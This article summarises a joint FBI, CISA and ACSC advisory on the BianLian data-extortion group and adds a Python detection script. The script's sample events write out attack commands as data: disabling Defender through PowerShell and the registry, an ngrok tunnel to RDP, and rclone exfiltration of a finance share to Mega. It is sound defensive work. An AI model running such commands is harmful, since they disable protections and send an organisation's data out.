FBI, CISA, and ACSC Expose BianLian Ransomware Group’s Tactics
The FBI, in collaboration with CISA and the Australian Cyber Security Centre (ACSC), has released an updated joint advisory detailing the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with the BianLian group, a ransomware and data-extortion crew.
Active since June 2022, BianLian has targeted critical infrastructure sectors in the United States and Australia, as well as professional services firms and the property development and construction industry. The group started out with a double-extortion model, encrypting victims' systems while threatening to publish stolen data. Around January 2023 it shifted primarily to exfiltration-based extortion, and by January 2024 it had dropped encryption altogether: the current operation steals data and demands payment not to leak it.
For initial access, BianLian actors use valid Remote Desktop Protocol (RDP) credentials, likely bought from initial access brokers or obtained through phishing, and exploit public-facing applications through vulnerabilities such as the ProxyShell chain in Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). Once inside, they install legitimate remote management tools and build command-and-control and tunnelling channels with utilities such as Ngrok and Rsocks, which let them reach internal services like RDP from outside the perimeter. For privilege escalation they have exploited CVE-2022-37969, an elevation-of-privilege flaw in the Windows Common Log File System (CLFS) driver rated 7.8 on the CVSS scale and patched by Microsoft in September 2022; a host still exposed to it is missing more than two years of updates.
To evade detection, the group uses PowerShell and the Windows Command Shell to disable antivirus tools and tamper protection, Windows Defender and the Antimalware Scan Interface (AMSI) among them, typically through registry changes. Network reconnaissance relies on tools such as Advanced Port Scanner alongside scripts that harvest credentials and enumerate Active Directory.
For exfiltration, BianLian runs PowerShell scripts that locate files of interest, compresses them, and moves the data out over FTP, with Rclone to cloud storage, or through the Mega file-sharing service. To increase pressure on victims, the actors have printed ransom notes on corporate printers and phoned employees directly.
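The defense-evasion, tunnelling, reconnaissance, and exfiltration behaviours described above all leave command lines behind in process-creation telemetry (Sysmon Event ID 1 or Windows 4688). The following is an added example written for this page, not code from the advisory or from any vendor: a small rule set that runs over such events, decodes PowerShell `-EncodedCommand` payloads before matching (an assumption on my part, since the advisory does not say whether the actors encode their commands), and escalates an account only when its hits span more than one stage of the intrusion. The event records, usernames, and paths are constructed for the example.

```python
"""Detect BianLian-style command-line activity in process-creation events.

Added example for this page; not part of the joint advisory. Sample events,
users and paths are constructed, not real telemetry.
"""
import base64
import re

# A PowerShell -EncodedCommand payload is base64 over UTF-16LE text.
_ENCODED_DISABLE = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16le")
).decode()

# Constructed events: the CommandLine and User fields of a Sysmon EID 1 record.
SAMPLE_EVENTS = [
    {"CommandLine": 'powershell.exe -nop -w hidden -c "Set-MpPreference '
                    '-DisableRealtimeMonitoring $true"', "User": "CORP\\svc-backup"},
    {"CommandLine": 'cmd.exe /c reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows '
                    'Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
     "User": "CORP\\svc-backup"},
    {"CommandLine": "ngrok.exe tcp 3389", "User": "CORP\\svc-backup"},
    {"CommandLine": 'rclone.exe copy "\\\\FS01\\Finance" mega:dump --transfers 8 -P',
     "User": "CORP\\svc-backup"},
    {"CommandLine": "Advanced_Port_Scanner_2.5.3869.exe /portable", "User": "CORP\\jdoe"},
    # Same Defender-disable command, hidden behind -EncodedCommand.
    {"CommandLine": f"powershell.exe -EncodedCommand {_ENCODED_DISABLE}",
     "User": "CORP\\svc-backup"},
    # Benign: reading Defender settings, and an ordinary archive job.
    {"CommandLine": "powershell.exe -c Get-MpPreference", "User": "CORP\\admin"},
    {"CommandLine": "7z.exe a report.7z C:\\reports", "User": "CORP\\jdoe"},
]

# Rule names are "<tactic>.<technique>" so hits can be grouped by stage.
RULES = [
    ("defense_evasion.defender_disabled_cmdlet", re.compile(
        r"Set-MpPreference\b[^|;]*-Disable(?:RealtimeMonitoring|BehaviorMonitoring"
        r"|IOAVProtection|ScriptScanning)\s+(?:\$true|1)\b", re.I)),
    ("defense_evasion.defender_disabled_registry", re.compile(
        r"\breg(?:\.exe)?\s+add\b.*Windows Defender.*\bDisableAnti(?:Spyware|Virus)\b"
        r".*/d\s+1\b", re.I)),
    ("c2.ngrok_rdp_tunnel", re.compile(r"\bngrok(?:\.exe)?\s+tcp\s+(?:\S+:)?3389\b", re.I)),
    ("c2.rsocks_proxy", re.compile(r"\brsocks(?:\.exe)?\b", re.I)),
    ("exfil.rclone_to_mega_or_ftp", re.compile(
        r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b.*\b(?:mega|ftp)\S*:", re.I)),
    ("discovery.advanced_port_scanner", re.compile(r"advanced_?port_?scanner", re.I)),
]

# powershell accepts -e, -ec, -enc and -EncodedCommand (case-insensitive).
_ENCODED_FLAG = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def normalize_command_line(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload so rules see the real content.

    Anything that is not valid base64/UTF-16LE is left untouched.
    """
    m = _ENCODED_FLAG.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return f"{cmd} [decoded: {decoded}]"


def match_rules(event: dict) -> list[str]:
    """Names of every rule whose pattern matches the (normalized) command line."""
    cmd = normalize_command_line(event.get("CommandLine", ""))
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(events) -> dict[str, set[str]]:
    """Map each user to the set of rule names that fired on their events."""
    hits: dict[str, set[str]] = {}
    for ev in events:
        names = match_rules(ev)
        if names:
            hits.setdefault(ev["User"], set()).update(names)
    return hits


def high_confidence(events, min_tactics: int = 2) -> list[str]:
    """Users whose hits span at least min_tactics distinct stages, sorted.

    A lone hit (an admin running a port scanner) deserves a look; disabling AV,
    tunnelling RDP and pushing data to Mega from one account is the BianLian shape.
    """
    escalate = []
    for user, names in triage(events).items():
        if len({n.split(".", 1)[0] for n in names}) >= min_tactics:
            escalate.append(user)
    return sorted(escalate)


if __name__ == "__main__":
    for user, names in triage(SAMPLE_EVENTS).items():
        print(user, sorted(names))
    print("escalate:", high_confidence(SAMPLE_EVENTS))
```

The per-account correlation is the part worth keeping: each rule on its own will fire on legitimate administration now and then, whereas an account that disables Defender, opens an Ngrok tunnel to 3389, and runs Rclone against a Mega remote within the same window is worth an immediate page. In production the events would come from your SIEM or EDR rather than the inline list, and the rule set would be extended with the remote management tools the advisory names.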
The FBI, CISA, and ACSC urge organizations to apply the advisory's mitigations. Key actions include auditing remote access tools and configurations, restricting and monitoring RDP, enforcing network segmentation, requiring phishing-resistant multi-factor authentication (MFA), and patching promptly, starting with internet-facing systems and the CVEs above. Maintaining offline backups and regularly testing defenses against the techniques in the advisory are also recommended. One caveat follows from the group's shift away from encryption: backups limit disruption but do nothing to stop a data leak, so the leverage lies in blocking initial access and catching reconnaissance and exfiltration early.